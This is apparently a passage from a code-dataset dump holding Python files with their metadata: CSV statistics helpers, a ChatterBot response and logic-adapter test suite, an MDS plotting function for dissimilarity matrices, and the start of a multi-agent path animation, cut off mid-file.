8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | null | null | null |
import csv
def save_statistics(experiment_name, line_to_add):
with open("{}.csv".format(experiment_name), 'a') as f:
writer = csv.writer(f)
writer.writerow(line_to_add)
def load_statistics(experiment_name):
data_dict = dict()
with open("{}.csv".format(experiment_name), 'r') as f:
lines = f.readlines()
data_labels = lines[0].replace("\n","").split(",")
del lines[0]
for label in data_labels:
data_dict[label] = []
for line in lines:
data = line.replace("\n","").split(",")
for key, item in zip(data_labels, data):
data_dict[key].append(item)
return data_dict
| 25.62963
| 58
| 0.58237
|
import csv
def save_statistics(experiment_name, line_to_add):
with open("{}.csv".format(experiment_name), 'a') as f:
writer = csv.writer(f)
writer.writerow(line_to_add)
def load_statistics(experiment_name):
data_dict = dict()
with open("{}.csv".format(experiment_name), 'r') as f:
lines = f.readlines()
data_labels = lines[0].replace("\n","").split(",")
del lines[0]
for label in data_labels:
data_dict[label] = []
for line in lines:
data = line.replace("\n","").split(",")
for key, item in zip(data_labels, data):
data_dict[key].append(item)
return data_dict
| true
| true
|
790c5a487bdcae7102f84217bc9e433fc15e4b6e
| 16,078
|
py
|
Python
|
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
from tests.base_case import ChatBotTestCase
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
class ChatterBotResponseTestCase(ChatBotTestCase):
def test_conversation_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'conversation': 'test 1'
})
self.assertEqual(response.conversation, 'test 1')
def test_tag_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'tags': [
'tag 1',
'tag 2'
]
})
self.assertEqual(len(response.tags), 2)
self.assertIn('tag 1', response.get_tags())
self.assertIn('tag 2', response.get_tags())
def test_in_response_to_provided(self):
"""
Test that the process of looking up the previous response
in the conversation is ignored if a previous response is provided.
"""
self.chatbot.get_response(
text='Hello',
in_response_to='Unique previous response.'
)
statement = self.chatbot.storage.filter(
text='Hello',
in_response_to='Unique previous response.'
)
self.assertIsNotNone(statement)
def test_get_initialization_functions(self):
"""
Test that the initialization functions are returned.
"""
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_spacy_similarity(self):
"""
Test that the initialization functions are returned.
"""
from chatterbot.comparisons import spacy_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = spacy_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_jaccard_similarity(self):
"""
Test that the initialization functions are returned.
"""
from chatterbot.comparisons import jaccard_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = jaccard_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_no_statements_known(self):
"""
If there is no statements in the database, then the
user's input is the only thing that can be returned.
"""
statement_text = 'How are you?'
response = self.chatbot.get_response(statement_text)
results = list(self.chatbot.storage.filter(text=statement_text))
self.assertEqual(response.text, statement_text)
self.assertEqual(response.confidence, 0)
# Make sure that the input and output were saved
self.assertIsLength(results, 2)
self.assertEqual(results[0].text, statement_text)
self.assertEqual(results[1].text, statement_text)
def test_one_statement_known_no_response(self):
"""
Test the case where a single statement is known, but
it is not in response to any other statement.
"""
self.chatbot.storage.create(text='Hello', in_response_to=None)
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_one_statement_one_response_known(self):
"""
Test the case that one response is known and there is a response
entry for it in the database.
"""
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_two_statements_one_response_known(self):
"""
Test the case that one response is known and there is a response
entry for it in the database.
"""
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 1)
self.assertEqual(response.text, 'Hello')
def test_three_statements_two_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 0)
def test_four_statements_three_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
self.chatbot.storage.create(text='I am well.', in_response_to='How are you?')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 1)
self.assertEqual(second_response.text, 'I am well.')
def test_second_response_unknown(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
first_response = self.chatbot.get_response(
text='Hi',
conversation='test'
)
second_response = self.chatbot.get_response(
text='How are you?',
conversation='test'
)
results = list(self.chatbot.storage.filter(text='How are you?'))
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(first_response.in_response_to, 'Hi')
self.assertEqual(second_response.confidence, 0)
self.assertEqual(second_response.in_response_to, 'How are you?')
# Make sure that the second response was saved to the database
self.assertIsLength(results, 1)
self.assertEqual(results[0].in_response_to, 'Hi')
def test_statement_added_to_conversation(self):
"""
An input statement should be added to the recent response list.
"""
statement = Statement(text='Wow!', conversation='test')
response = self.chatbot.get_response(statement)
self.assertEqual(statement.text, response.text)
self.assertEqual(response.conversation, 'test')
def test_get_response_additional_response_selection_parameters(self):
self.chatbot.storage.create_many([
Statement('A', conversation='test_1'),
Statement('B', conversation='test_1', in_response_to='A'),
Statement('A', conversation='test_2'),
Statement('C', conversation='test_2', in_response_to='A'),
])
statement = Statement(text='A', conversation='test_3')
response = self.chatbot.get_response(statement, additional_response_selection_parameters={
'conversation': 'test_2'
})
self.assertEqual(response.text, 'C')
self.assertEqual(response.conversation, 'test_3')
def test_get_response_unicode(self):
"""
Test the case that a unicode string is passed in.
"""
response = self.chatbot.get_response(u'سلام')
self.assertGreater(len(response.text), 0)
def test_get_response_emoji(self):
"""
Test the case that the input string contains an emoji.
"""
response = self.chatbot.get_response(u'💩 ')
self.assertGreater(len(response.text), 0)
def test_get_response_non_whitespace(self):
"""
Test the case that a non-whitespace C1 control string is passed in.
"""
response = self.chatbot.get_response(u'')
self.assertGreater(len(response.text), 0)
def test_get_response_two_byte_characters(self):
"""
Test the case that a string containing two-byte characters is passed in.
"""
response = self.chatbot.get_response(u'田中さんにあげて下さい')
self.assertGreater(len(response.text), 0)
def test_get_response_corrupted_text(self):
"""
Test the case that a string contains "corrupted" text.
"""
response = self.chatbot.get_response(u'Ṱ̺̺̕h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳.̨̹͈̣')
self.assertGreater(len(response.text), 0)
def test_response_with_tags_added(self):
"""
If an input statement has tags added to it,
that data should saved with the input statement.
"""
self.chatbot.get_response(Statement(
text='Hello',
in_response_to='Hi',
tags=['test']
))
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertIn('test', results[0].get_tags())
self.assertEqual(results[1].get_tags(), [])
def test_get_response_with_text_and_kwargs(self):
self.chatbot.get_response('Hello', conversation='greetings')
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertEqual(results[0].conversation, 'greetings')
self.assertEqual(results[1].conversation, 'greetings')
def test_get_response_missing_text(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response()
def test_get_response_missing_text_with_conversation(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response(conversation='test')
def test_generate_response(self):
statement = Statement(text='Many insects adopt a tripedal gait for rapid yet stable walking.')
response = self.chatbot.generate_response(statement)
self.assertEqual(response.text, statement.text)
self.assertEqual(response.confidence, 0)
def test_learn_response(self):
previous_response = Statement(text='Define Hemoglobin.')
statement = Statement(text='Hemoglobin is an oxygen-transport metalloprotein.')
self.chatbot.learn_response(statement, previous_response)
results = list(self.chatbot.storage.filter(text=statement.text))
self.assertIsLength(results, 1)
def test_get_response_does_not_add_new_statement(self):
"""
Test that a new statement is not learned if `read_only` is set to True.
"""
self.chatbot.read_only = True
self.chatbot.get_response('Hi!')
results = list(self.chatbot.storage.filter(text='Hi!'))
self.assertIsLength(results, 0)
def test_get_latest_response_from_zero_responses(self):
response = self.chatbot.get_latest_response('invalid')
self.assertIsNone(response)
def test_get_latest_response_from_one_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'A')
def test_get_latest_response_from_two_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'B')
def test_get_latest_response_from_three_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
self.chatbot.storage.create(text='D', conversation='test', in_response_to='C')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'C')
def test_search_text_results_after_training(self):
"""
ChatterBot should return close matches to an input
string when filtering using the search_text parameter.
"""
self.chatbot.storage.create_many([
Statement('Example A for search.'),
Statement('Another example.'),
Statement('Example B for search.'),
Statement(text='Another statement.'),
])
results = list(self.chatbot.storage.filter(
search_text=self.chatbot.storage.tagger.get_bigram_pair_string(
'Example A for search.'
)
))
self.assertEqual('Example A for search.', results[0].text)
self.assertEqual('Example B for search.', results[1].text)
self.assertIsLength(results, 2)
class TestAdapterA(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.2
return response
class TestAdapterB(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.5
return response
class TestAdapterC(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good night.')
response.confidence = 0.7
return response
class ChatBotLogicAdapterTestCase(ChatBotTestCase):
def test_sub_adapter_agreement(self):
"""
In the case that multiple adapters agree on a given
statement, this statement should be returned with the
highest confidence available from these matching options.
"""
self.chatbot.logic_adapters = [
TestAdapterA(self.chatbot),
TestAdapterB(self.chatbot),
TestAdapterC(self.chatbot)
]
statement = self.chatbot.generate_response(Statement(text='Howdy!'))
self.assertEqual(statement.confidence, 0.5)
self.assertEqual(statement.text, 'Good morning.')
def test_chatbot_set_for_all_logic_adapters(self):
for sub_adapter in self.chatbot.logic_adapters:
self.assertEqual(sub_adapter.chatbot, self.chatbot)
self.assertGreater(
len(self.chatbot.logic_adapters), 0,
msg='At least one logic adapter is expected for this test.'
)
def test_response_persona_is_bot(self):
"""
The response returned from the chatbot should be set to the name of the chatbot.
"""
response = self.chatbot.get_response('Hey everyone!')
self.assertEqual(response.persona, 'bot:Test Bot')
| 38.464115
| 123
| 0.668056
|
from tests.base_case import ChatBotTestCase
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
class ChatterBotResponseTestCase(ChatBotTestCase):
def test_conversation_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'conversation': 'test 1'
})
self.assertEqual(response.conversation, 'test 1')
def test_tag_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'tags': [
'tag 1',
'tag 2'
]
})
self.assertEqual(len(response.tags), 2)
self.assertIn('tag 1', response.get_tags())
self.assertIn('tag 2', response.get_tags())
def test_in_response_to_provided(self):
self.chatbot.get_response(
text='Hello',
in_response_to='Unique previous response.'
)
statement = self.chatbot.storage.filter(
text='Hello',
in_response_to='Unique previous response.'
)
self.assertIsNotNone(statement)
def test_get_initialization_functions(self):
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_spacy_similarity(self):
from chatterbot.comparisons import spacy_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = spacy_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_jaccard_similarity(self):
from chatterbot.comparisons import jaccard_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = jaccard_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_no_statements_known(self):
statement_text = 'How are you?'
response = self.chatbot.get_response(statement_text)
results = list(self.chatbot.storage.filter(text=statement_text))
self.assertEqual(response.text, statement_text)
self.assertEqual(response.confidence, 0)
self.assertIsLength(results, 2)
self.assertEqual(results[0].text, statement_text)
self.assertEqual(results[1].text, statement_text)
def test_one_statement_known_no_response(self):
self.chatbot.storage.create(text='Hello', in_response_to=None)
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_one_statement_one_response_known(self):
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_two_statements_one_response_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 1)
self.assertEqual(response.text, 'Hello')
def test_three_statements_two_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 0)
def test_four_statements_three_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
self.chatbot.storage.create(text='I am well.', in_response_to='How are you?')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 1)
self.assertEqual(second_response.text, 'I am well.')
def test_second_response_unknown(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
first_response = self.chatbot.get_response(
text='Hi',
conversation='test'
)
second_response = self.chatbot.get_response(
text='How are you?',
conversation='test'
)
results = list(self.chatbot.storage.filter(text='How are you?'))
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(first_response.in_response_to, 'Hi')
self.assertEqual(second_response.confidence, 0)
self.assertEqual(second_response.in_response_to, 'How are you?')
self.assertIsLength(results, 1)
self.assertEqual(results[0].in_response_to, 'Hi')
def test_statement_added_to_conversation(self):
statement = Statement(text='Wow!', conversation='test')
response = self.chatbot.get_response(statement)
self.assertEqual(statement.text, response.text)
self.assertEqual(response.conversation, 'test')
def test_get_response_additional_response_selection_parameters(self):
self.chatbot.storage.create_many([
Statement('A', conversation='test_1'),
Statement('B', conversation='test_1', in_response_to='A'),
Statement('A', conversation='test_2'),
Statement('C', conversation='test_2', in_response_to='A'),
])
statement = Statement(text='A', conversation='test_3')
response = self.chatbot.get_response(statement, additional_response_selection_parameters={
'conversation': 'test_2'
})
self.assertEqual(response.text, 'C')
self.assertEqual(response.conversation, 'test_3')
def test_get_response_unicode(self):
response = self.chatbot.get_response(u'سلام')
self.assertGreater(len(response.text), 0)
def test_get_response_emoji(self):
response = self.chatbot.get_response(u'💩 ')
self.assertGreater(len(response.text), 0)
def test_get_response_non_whitespace(self):
response = self.chatbot.get_response(u'')
self.assertGreater(len(response.text), 0)
def test_get_response_two_byte_characters(self):
response = self.chatbot.get_response(u'田中さんにあげて下さい')
self.assertGreater(len(response.text), 0)
def test_get_response_corrupted_text(self):
response = self.chatbot.get_response(u'Ṱ̺̺̕h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳.̨̹͈̣')
self.assertGreater(len(response.text), 0)
def test_response_with_tags_added(self):
self.chatbot.get_response(Statement(
text='Hello',
in_response_to='Hi',
tags=['test']
))
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertIn('test', results[0].get_tags())
self.assertEqual(results[1].get_tags(), [])
def test_get_response_with_text_and_kwargs(self):
self.chatbot.get_response('Hello', conversation='greetings')
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertEqual(results[0].conversation, 'greetings')
self.assertEqual(results[1].conversation, 'greetings')
def test_get_response_missing_text(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response()
def test_get_response_missing_text_with_conversation(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response(conversation='test')
def test_generate_response(self):
statement = Statement(text='Many insects adopt a tripedal gait for rapid yet stable walking.')
response = self.chatbot.generate_response(statement)
self.assertEqual(response.text, statement.text)
self.assertEqual(response.confidence, 0)
def test_learn_response(self):
previous_response = Statement(text='Define Hemoglobin.')
statement = Statement(text='Hemoglobin is an oxygen-transport metalloprotein.')
self.chatbot.learn_response(statement, previous_response)
results = list(self.chatbot.storage.filter(text=statement.text))
self.assertIsLength(results, 1)
def test_get_response_does_not_add_new_statement(self):
self.chatbot.read_only = True
self.chatbot.get_response('Hi!')
results = list(self.chatbot.storage.filter(text='Hi!'))
self.assertIsLength(results, 0)
def test_get_latest_response_from_zero_responses(self):
response = self.chatbot.get_latest_response('invalid')
self.assertIsNone(response)
def test_get_latest_response_from_one_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'A')
def test_get_latest_response_from_two_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'B')
def test_get_latest_response_from_three_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
self.chatbot.storage.create(text='D', conversation='test', in_response_to='C')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'C')
def test_search_text_results_after_training(self):
self.chatbot.storage.create_many([
Statement('Example A for search.'),
Statement('Another example.'),
Statement('Example B for search.'),
Statement(text='Another statement.'),
])
results = list(self.chatbot.storage.filter(
search_text=self.chatbot.storage.tagger.get_bigram_pair_string(
'Example A for search.'
)
))
self.assertEqual('Example A for search.', results[0].text)
self.assertEqual('Example B for search.', results[1].text)
self.assertIsLength(results, 2)
class TestAdapterA(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.2
return response
class TestAdapterB(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.5
return response
class TestAdapterC(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good night.')
response.confidence = 0.7
return response
class ChatBotLogicAdapterTestCase(ChatBotTestCase):
def test_sub_adapter_agreement(self):
self.chatbot.logic_adapters = [
TestAdapterA(self.chatbot),
TestAdapterB(self.chatbot),
TestAdapterC(self.chatbot)
]
statement = self.chatbot.generate_response(Statement(text='Howdy!'))
self.assertEqual(statement.confidence, 0.5)
self.assertEqual(statement.text, 'Good morning.')
def test_chatbot_set_for_all_logic_adapters(self):
for sub_adapter in self.chatbot.logic_adapters:
self.assertEqual(sub_adapter.chatbot, self.chatbot)
self.assertGreater(
len(self.chatbot.logic_adapters), 0,
msg='At least one logic adapter is expected for this test.'
)
def test_response_persona_is_bot(self):
response = self.chatbot.get_response('Hey everyone!')
self.assertEqual(response.persona, 'bot:Test Bot')
| true
| true
|
790c5b379c0da24ecfec766b38b7d9d3632b32e1
| 2,638
|
py
|
Python
|
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
def plot_mds_cond(rdm):
'''function to visualize RDM via multidimensional scaling'''
# big kudos to Jona Sassenhagen for doing an amazing job
# adding condition names and colors to the mds plot
# import modules and functions
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import manifold
from sklearn.decomposition import PCA
from matplotlib.collections import LineCollection
## computation/transformation section
# read in the rdm in .csv format, creating a data frame
df = pd.read_csv(rdm, index_col=0)
df.index = df.columns # set data frame index based on columns
# set seed for mds
seed = 0
# create mds object
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
# apply mds to data frame
rdm_mds = mds.fit(df.values).embedding_
# create new data frame from mds
df_mds = pd.DataFrame(rdm_mds, index=df.index, columns=["dim1", "dim2"])
df_mds["cond"] = df_mds.index # create condition column based on index
# create pca object
clf = PCA(n_components=2)
# set rdm data frame based on data frame values
rdm = pd.DataFrame(df.values)
# scale data
rdm = rdm.max() / rdm * 100
rdm[np.isinf(rdm)] = 0
# convert rdm data frame to array
rdm = rdm.as_matrix()
# apply pca to mds
rdm_mds_pca = clf.fit_transform(rdm_mds)
## plotting section
sns.set_style("white") # set seaborn style to white
# create lmplot from the mds data frame
g = sns.lmplot("dim1", "dim2", hue="cond", data=df_mds, fit_reg=False, legend=False)
ax = g.ax # set axes
sns.despine(ax=ax, trim=True, left=True, bottom=True) # despine graphic
ax.axes.get_xaxis().set_visible(False) # remove x axis
ax.axes.get_yaxis().set_visible(False) # remove y axis
ax.grid(False) # remove gird
# add condition names to plot
for dim1, dim2, name in df_mds.values:
ax.text(dim1 * 1.05, dim2 * 1.05, name)
# create segments
segments = [[rdm_mds[i, :], rdm_mds[j, :]]
for i in range(len(rdm_mds_pca)) for j in range(len(rdm_mds_pca))]
values = np.abs(rdm)
# set line collection
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Greys,
norm=plt.Normalize(0, values.max()))
lc.set_array(rdm.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc) # add line collection to plot
plt.tight_layout()
plt.show()
| 32.975
| 88
| 0.653904
|
def plot_mds_cond(rdm):
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import manifold
from sklearn.decomposition import PCA
from matplotlib.collections import LineCollection
ex_col=0)
df.index = df.columns
seed = 0
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
rdm_mds = mds.fit(df.values).embedding_
df_mds = pd.DataFrame(rdm_mds, index=df.index, columns=["dim1", "dim2"])
df_mds["cond"] = df_mds.index
clf = PCA(n_components=2)
rdm = pd.DataFrame(df.values)
rdm = rdm.max() / rdm * 100
rdm[np.isinf(rdm)] = 0
rdm = rdm.as_matrix()
rdm_mds_pca = clf.fit_transform(rdm_mds)
e("white")
g = sns.lmplot("dim1", "dim2", hue="cond", data=df_mds, fit_reg=False, legend=False)
ax = g.ax
sns.despine(ax=ax, trim=True, left=True, bottom=True)
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
ax.grid(False)
for dim1, dim2, name in df_mds.values:
ax.text(dim1 * 1.05, dim2 * 1.05, name)
segments = [[rdm_mds[i, :], rdm_mds[j, :]]
for i in range(len(rdm_mds_pca)) for j in range(len(rdm_mds_pca))]
values = np.abs(rdm)
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Greys,
norm=plt.Normalize(0, values.max()))
lc.set_array(rdm.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.tight_layout()
plt.show()
| true
| true
|
790c5bf214ecb97f0755569e215d0f279d8471ee
| 6,965
|
py
|
Python
|
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | 1
|
2021-03-25T20:51:13.000Z
|
2021-03-25T20:51:13.000Z
|
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | null | null | null |
visualize.py
|
mirtorande/grpf-tool
|
5c20365366503f28d63f861f1b0326cf1dcdcd7e
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from matplotlib.patches import Circle, Rectangle, ConnectionPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from math import floor
Colors = ['green', 'purple', 'orange', 'red', 'blue', 'yellow']
class Animation:
def __init__(self, my_map, starts, goals, paths, predictions):
self.my_map = np.flip(np.transpose(my_map), 1)
self.predictions = predictions
self.starts = []
for start in starts:
self.starts.append((start[1], len(self.my_map[0]) - 1 - start[0]))
self.goals = []
for goal in goals:
self.goals.append((goal[1], len(self.my_map[0]) - 1 - goal[0]))
self.paths = []
if paths:
for path in paths:
self.paths.append([])
for loc in path:
self.paths[-1].append((loc[1], len(self.my_map[0]) - 1 - loc[0]))
aspect = len(self.my_map) / len(self.my_map[0])
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
# self.ax.set_frame_on(False)
self.patches = []
self.artists = []
self.agents = dict()
self.agent_names = dict()
self.goal_predictions = dict()
self.agent_goal_connections = dict()
# create boundary patch
x_min = -0.5
y_min = -0.5
x_max = len(self.my_map) - 0.5
y_max = len(self.my_map[0]) - 0.5
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(np.arange(x_min, x_max, 1))
plt.yticks(np.arange(y_min, y_max, 1))
plt.grid(color='0.85')
self.patches.append(Rectangle((x_min, y_min), x_max - x_min, y_max - y_min, facecolor='none', edgecolor='gray'))
for i in range(len(self.my_map)):
for j in range(len(self.my_map[0])):
if self.my_map[i][j]:
self.patches.append(Rectangle((i - 0.5, j - 0.5), 1, 1, facecolor='gray', edgecolor='gray'))
self.T = 0
# draw goals
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.patches.append(Rectangle((goal[0] - 0.25, goal[1] - 0.25), 0.5, 0.5, facecolor=goal_color,
edgecolor='black', alpha=0.5))
# create agents
for a in range(len(self.paths)):
name = str(a)
self.agents[a] = Circle((starts[a][0], starts[a][1]), 0.3, facecolor=Colors[a % len(Colors)],
edgecolor='black')
self.agents[a].original_face_color = Colors[a % len(Colors)]
self.patches.append(self.agents[a])
self.T = max(self.T, len(paths[a]) - 1)
self.agent_names[a] = self.ax.text(starts[a][0], starts[a][1] + 0.25, name)
self.agent_names[a].set_horizontalalignment('center')
self.agent_names[a].set_verticalalignment('center')
self.artists.append(self.agent_names[a])
# connections & predictions
self.goal_predictions[a] = dict()
self.agent_goal_connections[a] = dict()
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.goal_predictions[a][i] = self.ax.text(goal[0], goal[1], str(i))
